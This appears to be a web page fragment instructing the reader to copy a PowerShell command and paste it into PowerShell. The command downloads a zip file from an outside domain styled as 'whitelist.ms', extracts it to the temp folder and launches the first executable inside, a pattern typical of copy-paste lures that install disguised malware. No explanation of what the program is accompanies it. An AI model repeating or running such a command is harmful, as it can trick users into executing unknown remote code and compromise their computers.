Copy the command
Copy the command below, then paste it into PowerShell.
Invoke-WebRequest -Uri "https://ac.whitelist.ms/whitelist.zip" -OutFile "$env:TEMP\whitelist.zip"; Expand-Archive -Path "$env:TEMP\whitelist.zip" -DestinationPath "$env:TEMP\whitelist" -Force; Start-Process -FilePath (Get-ChildItem "$env:TEMP\whitelist\*.exe" | Select-Object -First 1).FullName